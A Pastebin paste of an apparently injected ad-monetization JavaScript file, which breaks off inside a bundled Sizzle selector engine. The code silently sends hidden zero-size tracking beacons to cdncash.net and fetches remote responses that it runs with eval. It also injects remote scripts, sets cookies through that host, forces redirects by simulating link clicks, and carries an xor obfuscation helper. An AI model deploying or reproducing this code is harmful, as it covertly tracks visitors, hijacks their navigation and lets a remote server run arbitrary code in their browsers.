Advertisement
Guest User

http://s3.amazonaws.com/js-cache/c9f22c14a3872f280d.js

a guest
Apr 17th, 2017
41
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. (function(f, i, j) {
  2.     var g = "c9f22c14a3872f280d";
  3.     var b = (function() {
  4.         var l = 3;
  5.         var o = parseInt("0");
  6.         var n = parseInt("0");
  7.         (function() {
  8.             var q = ["mid=", "wid=51113", "sid=", "tid=3231", "rid=LAUNCHED"];
  9.             a = (window.location.protocol == "http:" ? "http:" : "https:") + "//cdncash.net/metric/?" + q.join("&");
  10.             var p = f.createElement("img");
  11.             p.setAttribute("style", "width:0;height:0;display:none;visibility:hidden;");
  12.             p.src = a + (a.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
  13.             (document.head || document.documentElement).appendChild(p);
  14.             if (typeof p.onload != j) {
  15.                 p.onload = function() {
  16.                     p.parentNode && p.parentNode.removeChild(p)
  17.                 }
  18.             }
  19.         })();
  20.         var m = false;
  21.         if (typeof(MainWindow) != "undefined") {
  22.             window.document = MainWindow.document.parentWindow
  23.         }
  24.         if (m) {
  25.             return false
  26.         }(function(d, w, uniqId, u) {
  27.             var isReady = false,
  28.                 readyQueue = [],
  29.                 div = u,
  30.                 $$ = {};
  31.             if (typeof(JSON) === u) {
  32.                 JSON = {}
  33.             }
  34.  
  35.             function onReady() {
  36.                 isReady = true;
  37.                 while (readyQueue.length > 0) {
  38.                     (readyQueue.pop())()
  39.                 }
  40.             }
  41.             if (typeof(d.getElementsByClassName) == u) {
  42.                 d.getElementsByClassName = function(cl) {
  43.                     var retnode = [];
  44.                     var myclass = new RegExp("\\b" + cl + "\\b");
  45.                     var elem = this.getElementsByTagName("*");
  46.                     for (var i = 0; i < elem.length; i++) {
  47.                         var classes = elem[i].className;
  48.                         if (myclass.test(classes)) {
  49.                             retnode.push(elem[i])
  50.                         }
  51.                     }
  52.                     return retnode
  53.                 }
  54.             }
  55.             $$ = w[uniqId] = {
  56.                 l: {},
  57.                 isIe: !!d.attachEvent,
  58.                 scriptDomain: "cdncash.net",
  59.                 unixTimestampNow: Math.round(new Date().getTime() / 1000),
  60.                 optoutValue: {},
  61.                 limitsValue: {},
  62.                 currentOptoutBlock: null,
  63.                 monetizationsConfig: {},
  64.                 ready: function(callback) {
  65.                     !isReady ? readyQueue.push(callback) : callback()
  66.                 },
  67.                 createEl: function(html) {
  68.                     if (div === u) {
  69.                         div = d.createElement("div")
  70.                     }
  71.                     div.innerHTML = html;
  72.                     return div.firstChild
  73.                 },
  74.                 each: function(array, callback) {
  75.                     var i = 0,
  76.                         length = array.length;
  77.                     for (; i < length;) {
  78.                         if (callback(array[i], i++) === false) {
  79.                             return true
  80.                         }
  81.                     }
  82.                 },
  83.                 inArray: function(array, e) {
  84.                     var i = 0,
  85.                         length = array.length;
  86.                     for (; i < length; i++) {
  87.                         if (e === array[i]) {
  88.                             return true
  89.                         }
  90.                     }
  91.                     return false
  92.                 },
  93.                 filter: function(array, callback) {
  94.                     var i = 0,
  95.                         length = array.length,
  96.                         ret = [];
  97.                     for (; i < length; i++) {
  98.                         if (callback(array[i], i)) {
  99.                             ret.push(array[i])
  100.                         }
  101.                     }
  102.                     return ret
  103.                 },
  104.                 apply: function() {
  105.                     var obj = {};
  106.                     $$.each(arguments, function(arg) {
  107.                         for (var i in arg) {
  108.                             obj[i] = arg[i]
  109.                         }
  110.                     });
  111.                     return obj
  112.                 },
  113.                 xhrRequest: function(xhr, o) {
  114.                     var timeoutId = u,
  115.                         isTimedout = false,
  116.                         $this = this;
  117.  
  118.                     function __gacb(data) {
  119.                         o.callback(data)
  120.                     }
  121.                     o.url += (o.url.indexOf("?") >= 0 ? "&" : "?") + "ajax";
  122.                     xhr.onreadystatechange = function() {
  123.                         if (isTimedout) {
  124.                             return
  125.                         }
  126.                         if (xhr.readyState === 4) {
  127.                             if (xhr.status === 200 && xhr.responseText) {
  128.                                 if (timeoutId) {
  129.                                     clearTimeout(timeoutId)
  130.                                 }
  131.                                 if (xhr.responseText.indexOf("__gacb(") > -1) {
  132.                                     eval(xhr.responseText)
  133.                                 } else {
  134.                                     o.callback($this.fromJson(xhr.responseText))
  135.                                 }
  136.                             }
  137.                         }
  138.                     };
  139.                     xhr.open("GET", o.url);
  140.                     xhr.withCredentials = false;
  141.                     timeoutId = setTimeout(function() {
  142.                         isTimedout = true;
  143.                         xhr.abort();
  144.                         $$.jsonpRequest(o)
  145.                     }, o.timeout);
  146.                     xhr.send()
  147.                 },
  148.                 jsonp: function(opts) {
  149.                     var timeoutId = u,
  150.                         isTimedout = false;
  151.                     var o = $$.apply({
  152.                         callback: function() {},
  153.                         timeout: 15000,
  154.                         onTimeout: function() {},
  155.                         data: {}
  156.                     }, opts || {});
  157.                     var r = Math.floor(Math.random() * 1000000000);
  158.                     var jsonpFunction = "__twb_cb_" + r;
  159.                     w[jsonpFunction] = function(data) {
  160.                         if (isTimedout) {
  161.                             return
  162.                         }
  163.                         if (timeoutId) {
  164.                             clearTimeout(timeoutId)
  165.                         }
  166.                         o.callback(data);
  167.                         onComplete()
  168.                     };
  169.                     var onComplete = function() {
  170.                         w[jsonpFunction] = u;
  171.                         if (s && s.parentNode) {
  172.                             s.parentNode.removeChild(s)
  173.                         }
  174.                     };
  175.                     o.url += (o.url.indexOf("?") >= 0 ? "&" : "?") + "jsonp=" + jsonpFunction + "&" + $$.toUrlParams(o.data);
  176.                     var s = $$.script(o.url);
  177.                     timeoutId = setTimeout(function() {
  178.                         isTimedout = true;
  179.                         o.onTimeout();
  180.                         onComplete()
  181.                     }, o.timeout)
  182.                 },
  183.                 toUrlParams: function(formdata, numeric_prefix, arg_separator) {
  184.                     var value, key, tmp = [];
  185.                     var _http_build_query_helper = function(key, val, arg_separator) {
  186.                         var k, tmp = [];
  187.                         if (val === true) {
  188.                             val = "1"
  189.                         } else {
  190.                             if (val === false) {
  191.                                 val = "0"
  192.                             }
  193.                         }
  194.                         if (val != null) {
  195.                             if (typeof val === "object") {
  196.                                 for (k in val) {
  197.                                     if (val[k] != null) {
  198.                                         tmp.push(_http_build_query_helper(key + "[" + k + "]", val[k], arg_separator))
  199.                                     }
  200.                                 }
  201.                                 return tmp.join(arg_separator)
  202.                             } else {
  203.                                 if (typeof val !== "function") {
  204.                                     return w.encodeURIComponent(key) + "=" + w.encodeURIComponent(val)
  205.                                 } else {
  206.                                     return ""
  207.                                 }
  208.                             }
  209.                         } else {
  210.                             return ""
  211.                         }
  212.                     };
  213.                     if (!arg_separator) {
  214.                         arg_separator = "&"
  215.                     }
  216.                     for (key in formdata) {
  217.                         value = formdata[key];
  218.                         if (numeric_prefix && !isNaN(key)) {
  219.                             key = String(numeric_prefix) + key
  220.                         }
  221.                         var query = _http_build_query_helper(key, value, arg_separator);
  222.                         if (query !== "") {
  223.                             tmp.push(query)
  224.                         }
  225.                     }
  226.                     return tmp.join(arg_separator)
  227.                 },
  228.                 jsonpRequest: function(o) {
  229.                     var timeoutId = u,
  230.                         isTimedout = false;
  231.                     callbackName = "f" + this.randomNumber(10000, 9999999);
  232.                     o.url += (o.url.indexOf("?") >= 0 ? "&" : "?") + "jsonp=" + callbackName;
  233.                     w[callbackName] = function(data) {
  234.                         if (isTimedout) {
  235.                             return
  236.                         }
  237.                         if (timeoutId) {
  238.                             clearTimeout(timeoutId)
  239.                         }
  240.                         o.callback(data)
  241.                     };
  242.                     var s = $$.script(o.url);
  243.                     timeoutId = setTimeout(function() {
  244.                         isTimedout = true;
  245.                         s.parentNode.removeChild(s);
  246.                         o.onTimeout()
  247.                     }, o.timeout)
  248.                 },
  249.                 toJson: JSON.stringify || function(obj) {
  250.                     var t = typeof(obj);
  251.                     if (t != "object" || obj === null) {
  252.                         if (t == "string") {
  253.                             obj = '"' + obj + '"'
  254.                         }
  255.                         return String(obj)
  256.                     } else {
  257.                         var n, v, json = [],
  258.                             arr = (obj && obj.constructor == Array);
  259.                         for (n in obj) {
  260.                             v = obj[n];
  261.                             t = typeof(v);
  262.                             if (t == "string") {
  263.                                 v = '"' + v + '"'
  264.                             } else {
  265.                                 if (t == "object" && v !== null) {
  266.                                     v = arguments.callee(v)
  267.                                 }
  268.                             }
  269.                             json.push((arr ? "" : '"' + n + '":') + String(v))
  270.                         }
  271.                         return (arr ? "[" : "{") + String(json) + (arr ? "]" : "}")
  272.                     }
  273.                 },
  274.                 fromJson: JSON.parse || function(str) {
  275.                     if (str === "") {
  276.                         str = '""'
  277.                     }
  278.                     eval("var p=" + str + ";");
  279.                     return p
  280.                 },
  281.                 xor: function(str) {
  282.                     var i = 0,
  283.                         length = str.length,
  284.                         ret = "";
  285.                     for (; i < length;) {
  286.                         ret += String.fromCharCode(77 ^ str.charCodeAt(i++))
  287.                     }
  288.                     return ret
  289.                 },
  290.                 script: function(src, nocache, attributes) {
  291.                     var s = d.createElement("script");
  292.                     s.type = "text/javascript";
  293.                     if (attributes) {
  294.                         for (var i in attributes) {
  295.                             s.setAttribute(i, attributes[i])
  296.                         }
  297.                     }
  298.                     s.src = src + (nocache === u || nocache ? (src.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime()) : "");
  299.                     d.getElementsByTagName("body")[0].appendChild(s);
  300.                     return s
  301.                 },
  302.                 includeCss: function(src) {
  303.                     var style = d.createElement("link");
  304.                     if (d.getElementsByTagName("body")[0]) {
  305.                         d.getElementsByTagName("body")[0].appendChild(style);
  306.                         style.rel = "stylesheet";
  307.                         style.type = "text/css";
  308.                         style.href = src
  309.                     }
  310.                 },
  311.                 hasClass: function(element, className) {
  312.                     return (!!element.getAttribute("class") && element.getAttribute("class").indexOf(className) > -1)
  313.                 },
  314.                 addClass: function(element, className) {
  315.                     element.setAttribute("class", (!!element.getAttribute("class") ? element.getAttribute("class") + " " : "") + className)
  316.                 },
  317.                 removeClass: function(element, className) {
  318.                     if (!!element.getAttribute("class")) {
  319.                         element.setAttribute("class", element.getAttribute("class").replace(className, ""))
  320.                     }
  321.                 },
  322.                 randomNumber: function(min, max) {
  323.                     return Math.floor(Math.random() * max) + min
  324.                 },
  325.                 eval: function(data) {
  326.                     var s = d.createElement("script");
  327.                     s.defer = true;
  328.                     s.text = data;
  329.                     (d.getElementsByTagName("script")[0] || d.documentElement.firstChild).parentNode.appendChild(s)
  330.                 },
  331.                 on: function(el, event, fn) {
  332.                     var handler = function(event) {
  333.                         fn.call(el, event || w.event)
  334.                     };
  335.                     if (el.addEventListener) {
  336.                         el.addEventListener(event, handler, false)
  337.                     } else {
  338.                         if (el.attachEvent) {
  339.                             el.attachEvent("on" + event, handler)
  340.                         }
  341.                     }
  342.                 },
  343.                 redirect: function(url, blank) {
  344.                     var a = d.createElement("a");
  345.                     a.href = url;
  346.                     if (blank) {
  347.                         a.target = "_blank"
  348.                     }
  349.                     a.__norewrite = true;
  350.                     d.body.appendChild(a);
  351.                     a.click();
  352.                     d.body.removeChild(a)
  353.                 },
  354.                 setCookie: function(name, value, opts) {
  355.                     var o = opts || {},
  356.                         expire = u;
  357.                     if (o.expire) {
  358.                         expire = new Date();
  359.                         expire.setTime(expire.getTime() + (o.expire * 1000))
  360.                     }
  361.                     document.cookie = encodeURIComponent(name) + "=" + encodeURIComponent(value) + (expire ? "; expires=" + expire.toUTCString() : "") + (o.path ? "; path=" + o.path : "") + (o.domain ? "; domain=" + o.domain : "")
  362.                 },
  363.                 getCookie: function(name) {
  364.                     var value = u;
  365.                     $$.each(d.cookie.split("; "), function(raw) {
  366.                         var parts = raw.split("=");
  367.                         var cookieName = decodeURIComponent(parts.shift());
  368.                         if (cookieName == name) {
  369.                             value = decodeURIComponent(parts.join("="));
  370.                             return false
  371.                         }
  372.                     });
  373.                     return value
  374.                 },
  375.                 encode: function(s) {
  376.                     var i = 0,
  377.                         ret = "",
  378.                         length = s.length;
  379.                     for (; i < length; i++) {
  380.                         ret += ("%" + s.charCodeAt(i).toString(16))
  381.                     }
  382.                     return ret
  383.                 },
  384.                 preventDefault: function(e) {
  385.                     if (e.preventDefault) {
  386.                         e.preventDefault()
  387.                     }
  388.                     return e.returnValue = false
  389.                 },
  390.                 remove: function(e) {
  391.                     return e.parentNode && e.parentNode.removeChild(e)
  392.                 },
  393.                 attr: function(e, name) {
  394.                     if (e.hasAttribute && e.hasAttribute(name)) {
  395.                         return e.getAttribute(name)
  396.                     } else {
  397.                         var node = e.getAttributeNode(name);
  398.                         if (node) {
  399.                             return node.value
  400.                         }
  401.                     }
  402.                     return ""
  403.                 },
  404.                 updateLimits: function(block, lifetime) {
  405.                     if (!lifetime) {
  406.                         var mConfig = {};
  407.                         if (w[uniqId].monetizationsConfig && w[uniqId].monetizationsConfig[block]) {
  408.                             mConfig = w[uniqId].monetizationsConfig[block]
  409.                         }
  410.                         lifetime = mConfig.limit
  411.                     }
  412.                     if (lifetime > 0) {
  413.                         $$.limitsValue[block] = $$.unixTimestampNow + parseInt(lifetime);
  414.                         var cookieValue = $$.toJson($$.limitsValue);
  415.                         $$.jsonp({
  416.                             url: (window.location.protocol == "http:" ? "http:" : "https:") + "//" + w[uniqId].scriptDomain + "/optout/set/limit",
  417.                             data: {
  418.                                 key: "c9f22c14a3872f280d",
  419.                                 cv: cookieValue
  420.                             },
  421.                             callback: function(response) {}
  422.                         })
  423.                     } else {}
  424.                 },
  425.                 setStartTime: function() {
  426.                     var cookieValue = $$.unixTimestampNow;
  427.                     $$.jsonp({
  428.                         url: (window.location.protocol == "http:" ? "http:" : "https:") + "//" + w[uniqId].scriptDomain + "/optout/set/strtm",
  429.                         data: {
  430.                             key: "c9f22c14a3872f280d",
  431.                             cv: cookieValue
  432.                         },
  433.                         callback: function(response) {}
  434.                     })
  435.                 },
  436.                 loadedCallback: function(code, block, custom1, custom2, custom3, custom4, custom5) {
  437.                     if (typeof block == "undefined") {
  438.                         block = ""
  439.                     }
  440.                     var params = ["mid=" + block, "wid=" + w[uniqId].tbParams.wid, "sid=" + w[uniqId].tbParams.sid, "tid=" + w[uniqId].tbParams.tid, "rid=" + code];
  441.                     if (custom1) {
  442.                         params.push("custom1=" + custom1)
  443.                     }
  444.                     if (custom2) {
  445.                         params.push("custom2=" + custom2)
  446.                     }
  447.                     if (custom3) {
  448.                         params.push("custom3=" + custom3)
  449.                     }
  450.                     if (custom4) {
  451.                         params.push("custom4=" + custom4)
  452.                     }
  453.                     if (custom5) {
  454.                         params.push("custom5=" + custom5)
  455.                     }
  456.                     var src = (window.location.protocol == "http:" ? "http:" : "https:") + "//" + w[uniqId].scriptDomain + "/metric/?" + params.join("&");
  457.                     var imgEl = d.createElement("img");
  458.                     imgEl.setAttribute("style", "width:0;height:0;display:none;visibility:hidden;");
  459.                     imgEl.src = src + (src.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
  460.                     d.getElementsByTagName("body")[0].appendChild(imgEl);
  461.                     $$.on(imgEl, "load", function() {
  462.                         $$.remove(imgEl)
  463.                     })
  464.                 },
  465.                 reportSetCallback: function(response) {},
  466.                 host: function(url) {
  467.                     var m = url.match(/^https?:\/\/([^\/]+)/);
  468.                     return m ? m[1] : ""
  469.                 },
  470.                 optoutShow: function(block) {
  471.                     if ($$.tbParams.optoutUrl) {
  472.                         location.href = $$.tbParams.optoutUrl
  473.                     } else {
  474.                         if (!$$.twBarOptOut && typeof $$.twBarOptOutInit == "function") {
  475.                             $$.twBarOptOutInit()
  476.                         }
  477.                         if ($$.twBarOptOut) {
  478.                             $$.currentOptoutBlock = block;
  479.                             $$.twBarOptOut.style.display = "block";
  480.                             $$.loadedCallback("OPTOUT_SHOW", block)
  481.                         }
  482.                     }
  483.                 },
  484.                 optoutHide: function(block) {
  485.                     if ($$.twBarOptOut) {
  486.                         $$.twBarOptOut.style.display = "none"
  487.                     }
  488.                 },
  489.                 getMonetizationConfig: function(block) {
  490.                     if (w[uniqId].monetizationsConfig && w[uniqId].monetizationsConfig[block] && w[uniqId].monetizationsConfig[block].config) {
  491.                         return w[uniqId].monetizationsConfig[block].config
  492.                     }
  493.                     return {}
  494.                 }
  495.             };
  496.             if (d.addEventListener) {
  497.                 d.addEventListener("DOMContentLoaded", function() {
  498.                     onReady()
  499.                 }, false)
  500.             } else {
  501.                 if (d.attachEvent) {
  502.                     d.attachEvent("onreadystatechange", function() {
  503.                         onReady()
  504.                     })
  505.                 }
  506.             }
  507.             if (d.readyState) {
  508.                 (function() {
  509.                     if ((!$$.isIe && d.readyState === "interactive") || d.readyState === "complete") {
  510.                         onReady()
  511.                     } else {
  512.                         setTimeout(arguments.callee, 100)
  513.                     }
  514.                 })()
  515.             } else {
  516.                 var toplevel = false;
  517.                 try {
  518.                     toplevel = window.frameElement == null
  519.                 } catch (e) {}
  520.                 if (d && d.dElement && d.dElement.doScroll && toplevel) {
  521.                     (function() {
  522.                         try {
  523.                             d.dElement.doScroll("left")
  524.                         } catch (e) {
  525.                             setTimeout(arguments.callee, 100);
  526.                             return
  527.                         }
  528.                         onReady()
  529.                     })()
  530.                 }
  531.             }
  532.         })(document, window, "c9f22c14a3872f280d", undefined);;
  533.         (function(aA, q) {
  534.             var G, aD, l, v, R, U, ag, aH, S, aj, L, w, at, an, aB, k, P, av = "sizzle" + -(new Date()),
  535.                 T = aA.document,
  536.                 aE = 0,
  537.                 ao = 0,
  538.                 d = J(),
  539.                 au = J(),
  540.                 Q = J(),
  541.                 ah = false,
  542.                 N = function() {
  543.                     return 0
  544.                 },
  545.                 az = typeof q,
  546.                 ab = 1 << 31,
  547.                 Y = ({}).hasOwnProperty,
  548.                 ax = [],
  549.                 ay = ax.pop,
  550.                 W = ax.push,
  551.                 b = ax.push,
  552.                 u = ax.slice,
  553.                 j = ax.indexOf || function(aJ) {
  554.                     var aI = 0,
  555.                         e = this.length;
  556.                     for (; aI < e; aI++) {
  557.                         if (this[aI] === aJ) {
  558.                             return aI
  559.                         }
  560.                     }
  561.                     return -1
  562.                 },
  563.                 c = "checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",
  564.                 x = "[\\x20\\t\\r\\n\\f]",
  565.                 a = "(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",
  566.                 V = a.replace("w", "w#"),
  567.                 aq = "\\[" + x + "*(" + a + ")" + x + "*(?:([*^$|!~]?=)" + x + "*(?:(['\"])((?:\\\\.|[^\\\\])*?)\\3|(" + V + ")|)|)" + x + "*\\]",
  568.                 s = ":(" + a + ")(?:\\(((['\"])((?:\\\\.|[^\\\\])*?)\\3|((?:\\\\.|[^\\\\()[\\]]|" + aq.replace(3, 8) + ")*)|.*)\\)|)",
  569.                 z = new RegExp("^" + x + "+|((?:^|[^\\\\])(?:\\\\.)*)" + x + "+$", "g"),
  570.                 D = new RegExp("^" + x + "*," + x + "*"),
  571.                 K = new RegExp("^" + x + "*([>+~]|" + x + ")" + x + "*"),
  572.                 al = new RegExp(x + "*[+~]"),
  573.                 B = new RegExp("=" + x + "*([^\\]'\"]*)" + x + "*\\]", "g"),
  574.                 ad = new RegExp(s),
  575.                 ae = new RegExp("^" + V + "$"),
  576.                 am = {
  577.                     ID: new RegExp("^#(" + a + ")"),
  578.                     CLASS: new RegExp("^\\.(" + a + ")"),
  579.                     TAG: new RegExp("^(" + a.replace("w", "w*") + ")"),
  580.                     ATTR: new RegExp("^" + aq),
  581.                     PSEUDO: new RegExp("^" + s),
  582.                     CHILD: new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\(" + x + "*(even|odd|(([+-]|)(\\d*)n|)" + x + "*(?:([+-]|)" + x + "*(\\d+)|))" + x + "*\\)|)", "i"),
  583.                     bool: new RegExp("^(?:" + c + ")$", "i"),
  584.                     needsContext: new RegExp("^" + x + "*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\(" + x + "*((?:-\\d)?\\d*)" + x + "*\\)|)(?=[^-]|$)", "i")
  585.                 },
  586.                 aa = /^[^{]+\{\s*\[native \w/,
  587.                 ac = /^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,
  588.                 h = /^(?:input|select|textarea|button)$/i,
  589.                 t = /^h\d$/i,
  590.                 X = /'|\\/g,
  591.                 A = new RegExp("\\\\([\\da-f]{1,6}" + x + "?|(" + x + ")|.)", "ig"),
  592.                 ap = function(e, aJ, i) {
  593.                     var aI = "0x" + aJ - 65536;
  594.                     return aI !== aI || i ? aJ : aI < 0 ? String.fromCharCode(aI + 65536) : String.fromCharCode(aI >> 10 | 55296, aI & 1023 | 56320)
  595.                 };
  596.             try {
  597.                 b.apply((ax = u.call(T.childNodes)), T.childNodes);
  598.                 ax[T.childNodes.length].nodeType
  599.             } catch (M) {
  600.                 b = {
  601.                     apply: ax.length ? function(i, e) {
  602.                         W.apply(i, u.call(e))
  603.                     } : function(aK, aJ) {
  604.                         var e = aK.length,
  605.                             aI = 0;
  606.                         while ((aK[e++] = aJ[aI++])) {}
  607.                         aK.length = e - 1
  608.                     }
  609.                 }
  610.             }
  611.  
  612.             function E(aP, aI, aT, aV) {
  613.                 var aU, aM, aN, aR, aS, aL, aK, e, aJ, aQ;
  614.                 if ((aI ? aI.ownerDocument || aI : T) !== L) {
  615.                     aj(aI)
  616.                 }
  617.                 aI = aI || L;
  618.                 aT = aT || [];
  619.                 if (!aP || typeof aP !== "string") {
  620.                     return aT
  621.                 }
  622.                 if ((aR = aI.nodeType) !== 1 && aR !== 9) {
  623.                     return []
  624.                 }
  625.                 if (at && !aV) {
  626.                     if ((aU = ac.exec(aP))) {
  627.                         if ((aN = aU[1])) {
  628.                             if (aR === 9) {
  629.                                 aM = aI.getElementById(aN);
  630.                                 if (aM && aM.parentNode) {
  631.                                     if (aM.id === aN) {
  632.                                         aT.push(aM);
  633.                                         return aT
  634.                                     }
  635.                                 } else {
  636.                                     return aT
  637.                                 }
  638.                             } else {
  639.                                 if (aI.ownerDocument && (aM = aI.ownerDocument.getElementById(aN)) && P(aI, aM) && aM.id === aN) {
  640.                                     aT.push(aM);
  641.                                     return aT
  642.                                 }
  643.                             }
  644.                         } else {
  645.                             if (aU[2]) {
  646.                                 b.apply(aT, aI.getElementsByTagName(aP));
  647.                                 return aT
  648.                             } else {
  649.                                 if ((aN = aU[3]) && aD.getElementsByClassName && aI.getElementsByClassName) {
  650.                                     b.apply(aT, aI.getElementsByClassName(aN));
  651.                                     return aT
  652.                                 }
  653.                             }
  654.                         }
  655.                     }
  656.                     if (aD.qsa && (!an || !an.test(aP))) {
  657.                         e = aK = av;
  658.                         aJ = aI;
  659.                         aQ = aR === 9 && aP;
  660.                         if (aR === 1 && aI.nodeName.toLowerCase() !== "object") {
  661.                             aL = p(aP);
  662.                             if ((aK = aI.getAttribute("id"))) {
  663.                                 e = aK.replace(X, "\\$&")
  664.                             } else {
  665.                                 aI.setAttribute("id", e)
  666.                             }
  667.                             e = "[id='" + e + "'] ";
  668.                             aS = aL.length;
  669.                             while (aS--) {
  670.                                 aL[aS] = e + o(aL[aS])
  671.                             }
  672.                             aJ = al.test(aP) && aI.parentNode || aI;
  673.                             aQ = aL.join(",")
  674.                         }
  675.                         if (aQ) {
  676.                             try {
  677.                                 b.apply(aT, aJ.querySelectorAll(aQ));
  678.                                 return aT
  679.                             } catch (aO) {} finally {
  680.                                 if (!aK) {
  681.                                     aI.removeAttribute("id")
  682.                                 }
  683.                             }
  684.                         }
  685.                     }
  686.                 }
  687.                 return aC(aP.replace(z, "$1"), aI, aT, aV)
  688.             }
  689.  
  690.             function O(e) {
  691.                 return aa.test(e + "")
  692.             }
  693.  
  694.             function J() {
  695.                 var i = [];
  696.  
  697.                 function e(aI, aJ) {
  698.                     if (i.push(aI += " ") > v.cacheLength) {
  699.                         delete e[i.shift()]
  700.                     }
  701.                     return (e[aI] = aJ)
  702.                 }
  703.                 return e
  704.             }
  705.  
  706.             function r(e) {
  707.                 e[av] = true;
  708.                 return e
  709.             }
  710.  
  711.             function m(i) {
  712.                 var aJ = L.createElement("div");
  713.                 try {
  714.                     return !!i(aJ)
  715.                 } catch (aI) {
  716.                     return false
  717.                 } finally {
  718.                     if (aJ.parentNode) {
  719.                         aJ.parentNode.removeChild(aJ)
  720.                     }
  721.                     aJ = null
  722.                 }
  723.             }
  724.  
  725.             function aF(e, aJ, aM) {
  726.                 e = e.split("|");
  727.                 var aL, aI = e.length,
  728.                     aK = aM ? null : aJ;
  729.                 while (aI--) {
  730.                     if (!(aL = v.attrHandle[e[aI]]) || aL === aJ) {
  731.                         v.attrHandle[e[aI]] = aK
  732.                     }
  733.                 }
  734.             }
  735.  
  736.             function Z(i, e) {
  737.                 var aI = i.getAttributeNode(e);
  738.                 return aI && aI.specified ? aI.value : i[e] === true ? e.toLowerCase() : null
  739.             }
  740.  
  741.             function H(i, e) {
  742.                 return i.getAttribute(e, e.toLowerCase() === "type" ? 1 : 2)
  743.             }
  744.  
  745.             function C(e) {
  746.                 if (e.nodeName.toLowerCase() === "input") {
  747.                     return e.defaultValue
  748.                 }
  749.             }
  750.  
  751.             function f(i, e) {
  752.                 var aJ = e && i,
  753.                     aI = aJ && i.nodeType === 1 && e.nodeType === 1 && (~e.sourceIndex || ab) - (~i.sourceIndex || ab);
  754.                 if (aI) {
  755.                     return aI
  756.                 }
  757.                 if (aJ) {
  758.                     while ((aJ = aJ.nextSibling)) {
  759.                         if (aJ === e) {
  760.                             return -1
  761.                         }
  762.                     }
  763.                 }
  764.                 return i ? 1 : -1
  765.             }
  766.  
  767.             function F(e) {
  768.                 return function(aI) {
  769.                     var i = aI.nodeName.toLowerCase();
  770.                     return i === "input" && aI.type === e
  771.                 }
  772.             }
  773.  
  774.             function g(e) {
  775.                 return function(aI) {
  776.                     var i = aI.nodeName.toLowerCase();
  777.                     return (i === "input" || i === "button") && aI.type === e
  778.                 }
  779.             }
  780.  
  781.             function ar(e) {
  782.                 return r(function(i) {
  783.                     i = +i;
  784.                     return r(function(aI, aM) {
  785.                         var aK, aJ = e([], aI.length, i),
  786.                             aL = aJ.length;
  787.                         while (aL--) {
  788.                             if (aI[(aK = aJ[aL])]) {
  789.                                 aI[aK] = !(aM[aK] = aI[aK])
  790.                             }
  791.                         }
  792.                     })
  793.                 })
  794.             }
  795.             U = E.isXML = function(e) {
  796.                 var i = e && (e.ownerDocument || e).documentElement;
  797.                 return i ? i.nodeName !== "HTML" : false
  798.             };
  799.             aD = E.support = {};
  800.             aj = E.setDocument = function(e) {
  801.                 var i = e ? e.ownerDocument || e : T;
  802.                 if (i === L || i.nodeType !== 9 || !i.documentElement) {
  803.                     return L
  804.                 }
  805.                 L = i;
  806.                 w = i.documentElement;
  807.                 at = !U(i);
  808.                 aD.attributes = m(function(aI) {
  809.                     aI.innerHTML = "<a href='#'></a>";
  810.                     aF("type|href|height|width", H, aI.firstChild.getAttribute("href") === "#");
  811.                     aF(c, Z, aI.getAttribute("disabled") == null);
  812.                     aI.className = "i";
  813.                     return !aI.getAttribute("className")
  814.                 });
  815.                 aD.input = m(function(aI) {
  816.                     aI.innerHTML = "<input>";
  817.                     aI.firstChild.setAttribute("value", "");
  818.                     return aI.firstChild.getAttribute("value") === ""
  819.                 });
  820.                 aF("value", C, aD.attributes && aD.input);
  821.                 aD.getElementsByTagName = m(function(aI) {
  822.                     aI.appendChild(i.createComment(""));
  823.                     return !aI.getElementsByTagName("*").length
  824.                 });
  825.                 aD.getElementsByClassName = m(function(aI) {
  826.                     aI.innerHTML = "<div class='a'></div><div class='a i'></div>";
  827.                     aI.firstChild.className = "i";
  828.                     return aI.getElementsByClassName("i").length === 2
  829.                 });
  830.                 aD.getById = m(function(aI) {
  831.                     w.appendChild(aI).id = av;
  832.                     return !i.getElementsByName || !i.getElementsByName(av).length
  833.                 });
  834.                 if (aD.getById) {
  835.                     v.find.ID = function(aK, aJ) {
  836.                         if (typeof aJ.getElementById !== az && at) {
  837.                             var aI = aJ.getElementById(aK);
  838.                             return aI && aI.parentNode ? [aI] : []
  839.                         }
  840.                     };
  841.                     v.filter.ID = function(aJ) {
  842.                         var aI = aJ.replace(A, ap);
  843.                         return function(aK) {
  844.                             return aK.getAttribute("id") === aI
  845.                         }
  846.                     }
  847.                 } else {
  848.                     delete v.find.ID;
  849.                     v.filter.ID = function(aJ) {
  850.                         var aI = aJ.replace(A, ap);
  851.                         return function(aL) {
  852.                             var aK = typeof aL.getAttributeNode !== az && aL.getAttributeNode("id");
  853.                             return aK && aK.value === aI
  854.                         }
  855.                     }
  856.                 }
  857.                 v.find.TAG = aD.getElementsByTagName ? function(aI, aJ) {
  858.                     if (typeof aJ.getElementsByTagName !== az) {
  859.                         return aJ.getElementsByTagName(aI)
  860.                     }
  861.                 } : function(aI, aM) {
  862.                     var aN, aL = [],
  863.                         aK = 0,
  864.                         aJ = aM.getElementsByTagName(aI);
  865.                     if (aI === "*") {
  866.                         while ((aN = aJ[aK++])) {
  867.                             if (aN.nodeType === 1) {
  868.                                 aL.push(aN)
  869.                             }
  870.                         }
  871.                         return aL
  872.                     }
  873.                     return aJ
  874.                 };
  875.                 v.find.CLASS = aD.getElementsByClassName && function(aJ, aI) {
  876.                     if (typeof aI.getElementsByClassName !== az && at) {
  877.                         return aI.getElementsByClassName(aJ)
  878.                     }
  879.                 };
  880.                 aB = [];
  881.                 an = [];
  882.                 if ((aD.qsa = O(i.querySelectorAll))) {
  883.                     m(function(aI) {
  884.                         aI.innerHTML = "<select><option selected=''></option></select>";
  885.                         if (!aI.querySelectorAll("[selected]").length) {
  886.                             an.push("\\[" + x + "*(?:value|" + c + ")")
  887.                         }
  888.                         if (!aI.querySelectorAll(":checked").length) {
  889.                             an.push(":checked")
  890.                         }
  891.                     });
  892.                     m(function(aJ) {
  893.                         var aI = i.createElement("input");
